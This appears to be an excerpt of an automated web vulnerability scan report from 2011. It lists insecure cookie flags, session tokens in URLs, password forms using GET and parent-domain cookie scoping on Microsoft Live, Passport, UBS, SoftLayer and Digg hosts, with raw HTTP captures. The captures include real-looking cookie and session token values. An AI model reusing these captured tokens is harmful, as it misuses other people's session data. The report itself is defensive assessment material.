Host:   https://login.live.com
Path:   /login.srf

Issue detail

The following cookies were issued by the application and do not have the secure flag set:
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /login.srf?wa=wsignin1.0&rpsnv=11&ct=1309950910&rver=6.1.6206.0&wp=MBI&wreply=http:%2F%2Fprofile.live.com%2FBadge%2F&lc=1033&id=73625&popupui=1 HTTP/1.1
Host: login.live.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: wlidperf=throughput=2&latency=1884; Sample=17; MWTMsgr=1; MUID=E361C23374E642C998D8ABA7166A75EC; E=P:P/yZGuUJzog=:Kzhdi7iyZGIIP6617hxekA9uY0QbUMz6hwgjPGAdv04=:F; xid=4eaac30d-fa12-4b9e-a769-aec310f3e37a&&BL2xxxxxC664&230; xidseq=1

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 14263
Content-Type: text/html; charset=utf-8
Expires: Wed, 06 Jul 2011 11:15:18 GMT
Server: Microsoft-IIS/7.5
P3P: CP="DSP CUR OTPi IND OTRi ONL FIN"
X-XSS-Protection: 0
Set-Cookie: MSPRequ=lt=1309950978&id=73625&co=1; path=/;version=1
Set-Cookie: MSPOK=$uuid-d5697c9c-79ed-4594-abc1-63001d12b87b$uuid-55d45d8a-4113-45e0-90d0-585f12970906; domain=login.live.com;path=/;version=1
X-Frame-Options: deny
PPServer: PPV: 30 H: BAYIDSLGN1E59 V: 0
Date: Wed, 06 Jul 2011 11:16:17 GMT
Connection: close

<!-- ServerInfo: BAYIDSLGN1E59 2011.06.02.00.31.45 Live1 Unknown LocVer:0 -->
<!-- PreprocessInfo: BTSA007:RR1BLDA130, -- Version: 11,0,18178,0 -->
<!-- RequestLCID: 1033, Market:EN-US, PrefCountry
...[SNIP]...

6.7. https://login.live.com/pp1100/

Summary

Severity:   Information
Confidence:   Certain
Host:   https://login.live.com
Path:   /pp1100/

Issue detail

The following cookies were issued by the application and do not have the secure flag set:
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /pp1100/ HTTP/1.1
Host: login.live.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 12506
Content-Type: text/html; charset=utf-8
Expires: Wed, 06 Jul 2011 11:20:03 GMT
Server: Microsoft-IIS/7.5
P3P: CP="DSP CUR OTPi IND OTRi ONL FIN"
X-XSS-Protection: 0
Set-Cookie: MSPRequ=lt=1309951263&co=1&id=N; path=/;version=1
Set-Cookie: MSPOK=$uuid-d5697c9c-79ed-4594-abc1-63001d12b87b$uuid-7de451db-9b09-4e35-8f6c-e4631fb77a69$uuid-d6a3848e-3000-4e73-b9aa-1fbbf88c0b72$uuid-bda392d9-cea9-45eb-8ed8-8becf6686968$uuid-1f6b6ccc-243c-4585-b8d9-61483ab07d76$uuid-173062aa-9edd-4769-b216-ebf691c92719; path=/;version=1
X-Frame-Options: deny
PPServer: PPV: 30 H: BAYIDSLGN1E41 V: 0
Date: Wed, 06 Jul 2011 11:21:02 GMT
Connection: close

<!-- ServerInfo: BAYIDSLGN1E41 2011.06.02.00.31.45 Live1 Unknown LocVer:0 -->
<!-- PreprocessInfo: BTSA007:RR1BLDA130, -- Version: 11,0,18178,0 -->
<!-- RequestLCID: 1033, Market:EN-US, PrefCountry
...[SNIP]...

6.8. https://login.live.com/ppsecure/post.srf

Summary

Severity:   Information
Confidence:   Certain
Host:   https://login.live.com
Path:   /ppsecure/post.srf

Issue detail

The following cookie was issued by the application and does not have the secure flag set:
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ppsecure/post.srf HTTP/1.1
Host: login.live.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 12542
Content-Type: text/html; charset=utf-8
Expires: Wed, 06 Jul 2011 11:20:03 GMT
Server: Microsoft-IIS/7.5
P3P: CP="DSP CUR OTPi IND OTRi ONL FIN"
X-XSS-Protection: 0
Set-Cookie: MSPOK=$uuid-d5697c9c-79ed-4594-abc1-63001d12b87b$uuid-7de451db-9b09-4e35-8f6c-e4631fb77a69$uuid-d6a3848e-3000-4e73-b9aa-1fbbf88c0b72$uuid-bda392d9-cea9-45eb-8ed8-8becf6686968$uuid-1f6b6ccc-243c-4585-b8d9-61483ab07d76$uuid-f4d8415d-863c-470b-9c48-033be61fa412; path=/;version=1
X-Frame-Options: deny
PPServer: PPV: 30 H: BAYIDSLGN1E54 V: 0
Date: Wed, 06 Jul 2011 11:21:02 GMT
Connection: close

<!-- ServerInfo: BAYIDSLGN1E54 2011.06.02.00.31.45 Live1 Unknown LocVer:0 -->
<!-- PreprocessInfo: BTSA007:RR1BLDA130, -- Version: 11,0,18178,0 -->
<!-- RequestLCID: 1033, Market:EN-US, PrefCountry
...[SNIP]...

6.9. https://login.live.com/ppsecure/secure.srf

Summary

Severity:   Information
Confidence:   Certain
Host:   https://login.live.com
Path:   /ppsecure/secure.srf

Issue detail

The following cookies were issued by the application and do not have the secure flag set:
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /ppsecure/secure.srf HTTP/1.1
Host: login.live.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 12531
Content-Type: text/html; charset=utf-8
Expires: Wed, 06 Jul 2011 11:20:03 GMT
Server: Microsoft-IIS/7.5
P3P: CP="DSP CUR OTPi IND OTRi ONL FIN"
X-XSS-Protection: 0
Set-Cookie: MSPRequ=lt=1309951263&co=1&id=N; path=/;version=1
Set-Cookie: MSPOK=$uuid-d5697c9c-79ed-4594-abc1-63001d12b87b$uuid-7de451db-9b09-4e35-8f6c-e4631fb77a69$uuid-d6a3848e-3000-4e73-b9aa-1fbbf88c0b72$uuid-bda392d9-cea9-45eb-8ed8-8becf6686968$uuid-1f6b6ccc-243c-4585-b8d9-61483ab07d76$uuid-2f030afb-c784-4e3b-9dbe-a3f70a5aa8ef; path=/;version=1
X-Frame-Options: deny
PPServer: PPV: 30 H: BAYIDSLGN1E32 V: 0
Date: Wed, 06 Jul 2011 11:21:03 GMT
Connection: close

<!-- ServerInfo: BAYIDSLGN1E32 2011.06.02.00.31.45 Live1 Unknown LocVer:0 -->
<!-- PreprocessInfo: BTSA007:RR1BLDA130, -- Version: 11,0,18178,0 -->
<!-- RequestLCID: 1033, Market:EN-US, PrefCountry
...[SNIP]...

6.10. https://login.live.com/resetpw.srf

Summary

Severity:   Information
Confidence:   Certain
Host:   https://login.live.com
Path:   /resetpw.srf

Issue detail

The following cookies were issued by the application and do not have the secure flag set:
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /resetpw.srf?wa=wsignin1.0&rpsnv=11&ct=1309951117&rver=5.5.4177.0&wp=LBI&wreply=https:%2F%2Flive.zune.net%2Fxweb%2Flive%2Fpassport%2FsetCookies.ashx%3Frru%3DhttpZ3AZ2FZ2FsocialZ2EzuneZ2EnetZ2FMOVIESZ2F0Z2F34FA18ECZ2DECDAZ2D4609Z2DBE85Z2DCE80D58C3842Z3FtargetZ3Dweb&cb=B001033httpZ3AZ2FZ2FsocialZ2EzuneZ2EnetZ2FMOVIESZ2F0Z2F34FA18ECZ2DECDAZ2D4609Z2DBE85Z2DCE80D58C3842Z3FtargetZ3Dweb&id=75046&id=75046&vv=1100&mkt=EN-US&lc=1033&bk=1309951135 HTTP/1.1
Host: login.live.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 2145
Content-Type: text/html; charset=utf-8
Expires: Wed, 06 Jul 2011 14:07:45 GMT
Server: Microsoft-IIS/7.5
P3P: CP="DSP CUR OTPi IND OTRi ONL FIN"
X-XSS-Protection: 0
Set-Cookie: MSPOK=$uuid-d5697c9c-79ed-4594-abc1-63001d12b87b$uuid-7de451db-9b09-4e35-8f6c-e4631fb77a69$uuid-d6a3848e-3000-4e73-b9aa-1fbbf88c0b72$uuid-bda392d9-cea9-45eb-8ed8-8becf6686968$uuid-1f6b6ccc-243c-4585-b8d9-61483ab07d76$uuid-3ccd6cb3-2eff-4d36-a83a-da7d7f8300dc; path=/;version=1
Set-Cookie: MSPBack=1309951135; domain=login.live.com;path=/;version=1
PPServer: PPV: 30 H: BAYIDSLGN1O48 V: 0
Date: Wed, 06 Jul 2011 14:08:45 GMT
Connection: close

<html><head><noscript>JavaScript required to sign in<meta http-equiv="Refresh" content="0; URL=https://login.live.com/jsDisabled.srf?mkt=EN-US&lc=1033"/></noscript><title>Continue</title><script type=
...[SNIP]...

6.11. https://msnia.login.live.com/ppsecure/post.srf

Summary

Severity:   Information
Confidence:   Certain
Host:   https://msnia.login.live.com
Path:   /ppsecure/post.srf

Issue detail

The following cookie was issued by the application and does not have the secure flag set:
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ppsecure/post.srf HTTP/1.1
Host: msnia.login.live.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 12632
Content-Type: text/html; charset=utf-8
Expires: Wed, 06 Jul 2011 11:20:33 GMT
Server: Microsoft-IIS/7.5
P3P: CP="DSP CUR OTPi IND OTRi ONL FIN"
X-XSS-Protection: 0
Set-Cookie: MSPOK=$uuid-d5697c9c-79ed-4594-abc1-63001d12b87b$uuid-7de451db-9b09-4e35-8f6c-e4631fb77a69$uuid-d6a3848e-3000-4e73-b9aa-1fbbf88c0b72$uuid-bda392d9-cea9-45eb-8ed8-8becf6686968$uuid-1f6b6ccc-243c-4585-b8d9-61483ab07d76$uuid-3040ca2c-de70-4a63-9d3d-1c68eed3a3d2; domain=login.live.com;path=/;version=1
X-Frame-Options: deny
PPServer: PPV: 30 H: TK2IDSMLGN1A10 V: 0
Date: Wed, 06 Jul 2011 11:21:32 GMT
Connection: close

<!-- ServerInfo: TK2IDSMLGN1A10 2011.06.02.00.31.45 Live1 Unknown LocVer:0 -->
<!-- PreprocessInfo: BTSA007:RR1BLDA130, -- Version: 11,0,18178,0 -->
<!-- RequestLCID: 1033, Market:EN-US, PrefCountr
...[SNIP]...

6.12. https://quotes-public.ubs.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   https://quotes-public.ubs.com
Path:   /

Issue detail

The following cookie was issued by the application and does not have the secure flag set:
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: quotes-public.ubs.com
Connection: keep-alive
Referer: https://www2.ubs.com/1/ssl/e/contact/contact.html?NavLB_Www=1309960260
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: www-stats=130ffb6627c.8526e520; NavLB_Www=www2.ubs.com; WT_FPC=id=14.96.190.152-2611613264.30161891:lv=1309981931097:ss=1309981804815

Response

HTTP/1.1 302 Found
Date: Wed, 06 Jul 2011 13:53:56 GMT
Server: Apache
Pragma: no-cache
Set-Cookie: NavLB_PQ=quotes-public1.ubs.com; Domain=.ubs.com; Path=/; Version=1
Connection: close
Location: https://quotes-public1.ubs.com:443/?NavLB_PQ=1309960436
Cache-Control: no-cache
P3P: CP="OTI DSP CURa OUR LEG COM NAV INT"
Content-Length: 288
Content-Type: text/html; charset=utf-8

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/REC-html40/loose.dtd">
<HTML><HEAD>
<TITLE>302 Found</TITLE>
</HEAD><BODY>
<H1>Found</H1>
The document has moved <A
...[SNIP]...

7. Session token in URL
There are 3 instances of this issue:

Issue background

Sensitive information within URLs may be logged in various locations, including the user's browser, the web server, and any forward or reverse proxy servers between the two endpoints. URLs may also be displayed on-screen, bookmarked or emailed around by users. They may be disclosed to third parties via the Referer header when any off-site links are followed. Placing session tokens into the URL increases the risk that they will be captured by an attacker.

Issue remediation

The application should use an alternative mechanism for transmitting session tokens, such as HTTP cookies or hidden fields in forms that are submitted using the POST method.


7.1. https://manage.softlayer.com/

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://manage.softlayer.com
Path:   /

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET / HTTP/1.1
Host: manage.softlayer.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 06 Jul 2011 11:20:43 GMT
Server: Apache
Connection: close
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Content-Length: 18394

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" version="XHTML+RDFa 1.0" xml:lang="en-us">
<head>
...[SNIP]...
<li><a id="_lpChatBtn1" target="chat12703439" href="https://sales.liveperson.net/hc/12703439/?cmd=file&amp;file=visitorWantsToChat&amp;site=12703439&amp;byhref=1&amp;SESSIONVAR%21skill=Sales-SL-Portal-English&amp;imageUrl=https%3A%2F%2Fwww.softlayer.com%2Fimg" onClick="javascript:window.open('https://sales.liveperson.net/hc/12703439/?cmd=file&amp;file=visitorWantsToChat&amp;site=12703439&amp;SESSIONVAR%21skill=Sales-SL-Portal-English&amp;imageUrl=https%3A%2F%2Fwww.softlayer.com%2Fimg&amp;referrer='+escape(document.location),'chat12703439','width=500,height=500,resizable=yes');return false;" class="red linkN">sales chat</a>
...[SNIP]...

7.2. https://manage.softlayer.com/Sales/orderComputingInstance

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://manage.softlayer.com
Path:   /Sales/orderComputingInstance

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET /Sales/orderComputingInstance HTTP/1.1
Host: manage.softlayer.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=1.1306442258.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; __qca=P0-1683070318-1308913155755; _mkto_trk=id:220-ESA-932&token:_mch-softlayer.com-1306437485169-98953; __utma=1.1168266774.1306437626.1306442258.1308913135.3

Response

HTTP/1.1 200 OK
Date: Wed, 06 Jul 2011 11:14:55 GMT
Server: Apache
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Content-Length: 18438

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" version="XHTML+RDFa 1.0" xml:lang="en-us">
<head>
...[SNIP]...
<li><a id="_lpChatBtn1" target="chat12703439" href="https://sales.liveperson.net/hc/12703439/?cmd=file&amp;file=visitorWantsToChat&amp;site=12703439&amp;byhref=1&amp;SESSIONVAR%21skill=Sales-SL-Portal-English&amp;imageUrl=https%3A%2F%2Fwww.softlayer.com%2Fimg" onClick="javascript:window.open('https://sales.liveperson.net/hc/12703439/?cmd=file&amp;file=visitorWantsToChat&amp;site=12703439&amp;SESSIONVAR%21skill=Sales-SL-Portal-English&amp;imageUrl=https%3A%2F%2Fwww.softlayer.com%2Fimg&amp;referrer='+escape(document.location),'chat12703439','width=500,height=500,resizable=yes');return false;" class="red linkN">sales chat</a>
...[SNIP]...

7.3. https://manage.softlayer.com/index/index

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://manage.softlayer.com
Path:   /index/index

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET /index/index HTTP/1.1
Host: manage.softlayer.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 06 Jul 2011 11:20:45 GMT
Server: Apache
Connection: close
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Content-Length: 18404

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" version="XHTML+RDFa 1.0" xml:lang="en-us">
<head>
...[SNIP]...
<li><a id="_lpChatBtn1" target="chat12703439" href="https://sales.liveperson.net/hc/12703439/?cmd=file&amp;file=visitorWantsToChat&amp;site=12703439&amp;byhref=1&amp;SESSIONVAR%21skill=Sales-SL-Portal-English&amp;imageUrl=https%3A%2F%2Fwww.softlayer.com%2Fimg" onClick="javascript:window.open('https://sales.liveperson.net/hc/12703439/?cmd=file&amp;file=visitorWantsToChat&amp;site=12703439&amp;SESSIONVAR%21skill=Sales-SL-Portal-English&amp;imageUrl=https%3A%2F%2Fwww.softlayer.com%2Fimg&amp;referrer='+escape(document.location),'chat12703439','width=500,height=500,resizable=yes');return false;" class="red linkN">sales chat</a>
...[SNIP]...

8. Password field submitted using GET method
There are 7 instances of this issue:

Issue background

The application uses the GET method to submit passwords, which are transmitted within the query string of the requested URL. Sensitive information within URLs may be logged in various locations, including the user's browser, the web server, and any forward or reverse proxy servers between the two endpoints. URLs may also be displayed on-screen, bookmarked or emailed around by users. They may be disclosed to third parties via the Referer header when any off-site links are followed. Placing passwords into the URL increases the risk that they will be captured by an attacker.

Issue remediation

All forms submitting passwords should use the POST method. To achieve this, you should specify the method attribute of the FORM tag as method="POST". It may also be necessary to modify the corresponding server-side form handler to ensure that submitted passwords are properly retrieved from the message body, rather than the URL.


8.1. http://digg.com/

Summary

Severity:   Low
Confidence:   Certain
Host:   http://digg.com
Path:   /

Issue detail

The page contains a form with the following action URL, which is submitted using the GET method:
The form contains the following password field:

Request

GET / HTTP/1.1
Host: digg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 06 Jul 2011 11:37:06 GMT
Server: Apache
X-Powered-By: PHP/5.2.9-digg8
Cache-Control: no-cache,no-store,must-revalidate
Pragma: no-cache
Set-Cookie: imp_id=be4697b47d58b1200ef3f6956c8cc49e2813419339d6fd7bb526092b66b1dc13; expires=Thu, 07-Jul-2011 11:37:07 GMT; path=/; domain=digg.com
X-Digg-Time: D=237528 10.2.129.225
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 101255

<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<title>Digg
- All Topics
- The Latest News Headlines, Videos and Images
</title>

<met
...[SNIP]...
</script><form class="hidden">
<input type="text" name="ident" value="" id="ident-saved">
<input type="password" name="password" value="" id="password-saved">
</form>
...[SNIP]...

8.2. http://digg.com/login

Summary

Severity:   Low
Confidence:   Certain
Host:   http://digg.com
Path:   /login

Issue detail

The page contains a form with the following action URL, which is submitted using the GET method:
The form contains the following password field:

Request

GET /login HTTP/1.1
Host: digg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 06 Jul 2011 11:37:08 GMT
Server: Apache
X-Powered-By: PHP/5.2.9-digg8
X-Digg-Time: D=24276 10.2.129.225
Cache-Control: no-cache,no-store,must-revalidate
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 8609

<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<title>Digg</title>

<meta name="keywords" content="Digg, pictures, breaking news, entertainment, politics, technology, headlin
...[SNIP]...
</script><form class="hidden">
<input type="text" name="ident" value="" id="ident-saved">
<input type="password" name="password" value="" id="password-saved">
</form>
...[SNIP]...

8.3. http://digg.com/register

Summary

Severity:   Low
Confidence:   Certain
Host:   http://digg.com
Path:   /register

Issue detail

The page contains a form with the following action URL, which is submitted using the GET method:
The form contains the following password field:

Request

GET /register HTTP/1.1
Host: digg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 06 Jul 2011 11:37:08 GMT
Server: Apache
X-Powered-By: PHP/5.2.9-digg8
X-Digg-Time: D=38879 10.2.129.225
Cache-Control: no-cache,no-store,must-revalidate
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 10144

<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<title>Digg</title>

<meta name="keywords" content="Digg, pictures, breaking news, entertainment, politics, technology, headlin
...[SNIP]...
</script><form class="hidden">
<input type="text" name="ident" value="" id="ident-saved">
<input type="password" name="password" value="" id="password-saved">
</form>
...[SNIP]...

8.4. http://digg.com/search

Summary

Severity:   Low
Confidence:   Certain
Host:   http://digg.com
Path:   /search

Issue detail

The page contains a form with the following action URL, which is submitted using the GET method:
The form contains the following password field:

Request

GET /search HTTP/1.1
Host: digg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 06 Jul 2011 11:37:09 GMT
Server: Apache
X-Powered-By: PHP/5.2.9-digg8
X-Digg-Time: D=27180 10.2.129.226
Cache-Control: no-cache,no-store,must-revalidate
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 8308

<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<title>Digg
- Search
</title>

<meta name="keywords" content="Digg, pictures, breaking news, entertainment, pol
...[SNIP]...
</script><form class="hidden">
<input type="text" name="ident" value="" id="ident-saved">
<input type="password" name="password" value="" id="password-saved">
</form>
...[SNIP]...

8.5. http://digg.com/submit

Summary

Severity:   Low
Confidence:   Certain
Host:   http://digg.com
Path:   /submit

Issue detail

The page contains a form with the following action URL, which is submitted using the GET method:
The form contains the following password field:

Request

GET /submit?phase=2&url=https://www.microsoft.com/presspass/presskits/DCU/default.aspx HTTP/1.1
Host: digg.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Wed, 06 Jul 2011 11:16:13 GMT
Server: Apache
X-Powered-By: PHP/5.2.9-digg8
X-Digg-Time: D=24761 10.2.128.235
Cache-Control: no-cache,no-store,must-revalidate
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html;charset=UTF-8
Content-Length: 8620

<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<title>Digg
- Submit a link
</title>

<meta name="keywords" content="Digg, pictures, breaking news, entertainment, politics
...[SNIP]...
</script><form class="hidden">
<input type="text" name="ident" value="" id="ident-saved">
<input type="password" name="password" value="" id="password-saved">
</form>
...[SNIP]...

8.6. http://digg.com/topic

Summary

Severity:   Low
Confidence:   Certain
Host:   http://digg.com
Path:   /topic

Issue detail

The page contains a form with the following action URL, which is submitted using the GET method:
The form contains the following password field:

Request

GET /topic HTTP/1.1
Host: digg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 06 Jul 2011 11:37:09 GMT
Server: Apache
X-Powered-By: PHP/5.2.9-digg8
X-Digg-Time: D=31422 10.2.129.226
Cache-Control: no-cache,no-store,must-revalidate
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 12469

<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<title>Digg</title>

<meta name="keywords" content="Digg, pictures, breaking news, entertainment, politics, technology, headlin
...[SNIP]...
</script><form class="hidden">
<input type="text" name="ident" value="" id="ident-saved">
<input type="password" name="password" value="" id="password-saved">
</form>
...[SNIP]...

8.7. http://digg.com/upcoming

Summary

Severity:   Low
Confidence:   Certain
Host:   http://digg.com
Path:   /upcoming

Issue detail

The page contains a form with the following action URL, which is submitted using the GET method:
The form contains the following password field:

Request

GET /upcoming HTTP/1.1
Host: digg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 06 Jul 2011 11:37:07 GMT
Server: Apache
X-Powered-By: PHP/5.2.9-digg8
Cache-Control: no-cache,no-store,must-revalidate
Pragma: no-cache
Set-Cookie: imp_id=d49aeb50a0490b4b7e1f800682c23d942b50abde233eda6a7b26c684f1cf95d6; expires=Thu, 07-Jul-2011 11:37:07 GMT; path=/; domain=digg.com
X-Digg-Time: D=300792 10.2.129.80
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 98962

<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<title>Digg
- All Topics
- Upcoming News Headlines, Videos and Images
</title>

<meta
...[SNIP]...
</script><form class="hidden">
<input type="text" name="ident" value="" id="ident-saved">
<input type="password" name="password" value="" id="password-saved">
</form>
...[SNIP]...

9. Cookie scoped to parent domain
There are 44 instances of this issue:

Issue background

A cookie's domain attribute determines which domains can access the cookie. Browsers will automatically submit the cookie in requests to in-scope domains, and those domains will also be able to access the cookie via JavaScript. If a cookie is scoped to a parent domain, then that cookie will be accessible by the parent domain and also by any other subdomains of the parent domain. If the cookie contains sensitive data (such as a session token) then this data may be accessible by less trusted or less secure applications residing at those domains, leading to a security compromise.

Issue remediation

By default, cookies are scoped to the issuing domain and all subdomains. If you remove the explicit domain attribute from your Set-cookie directive, then the cookie will have this default scope, which is safe and appropriate in most situations. If you particularly need a cookie to be accessible by a parent domain, then you should thoroughly review the security of the applications residing on that domain and its subdomains, and confirm that you are willing to trust the people and systems which support those applications.


9.1. https://accountservices.passport.net/gethip.srf

Summary

Severity:   Low
Confidence:   Firm
Host:   https://accountservices.passport.net
Path:   /gethip.srf

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /gethip.srf?lc=1033&fid=2044200945&id=75046&fre=hard&type=visual HTTP/1.1
Host: accountservices.passport.net
Connection: keep-alive
Referer: https://accountservices.passport.net/uiresetpw.srf?mkt=EN-US&lc=1033&id=75046
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CkTst=G1309951137024

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 19932
Content-Type: text/html; charset=utf-8
Expires: Wed, 06 Jul 2011 11:20:14 GMT
Server: Microsoft-IIS/7.5
P3P: CP="DSP CUR OTPi IND OTRi ONL FIN"
Set-Cookie: HIPSession=45S*6vuIWEDZGNM0*09htdJwOMobm7R5E2ZMW2RB2dSGkqC*apBp98w1vt43A3esAug*iHMBVLNvVAtuPikOTavfE!XPLQvoM*ecgi7xDXNJg$; domain=.passport.net;path=/;version=1
PPServer: PPV: 30 H: BAYIDSPROF1D05 V: 0
Date: Wed, 06 Jul 2011 11:21:13 GMT
Connection: close

var HIPM={name:"HIPM",innerFrame:null,comeinURLr:"",comeinURL:"",vv:"",eEmpty:"",eTooLong:"",eWrongAnswer:"",solutionElemt:"",afr:"audio",vfr:"visual",instruction:"",starttime:null,endtime:null,solnti
...[SNIP]...

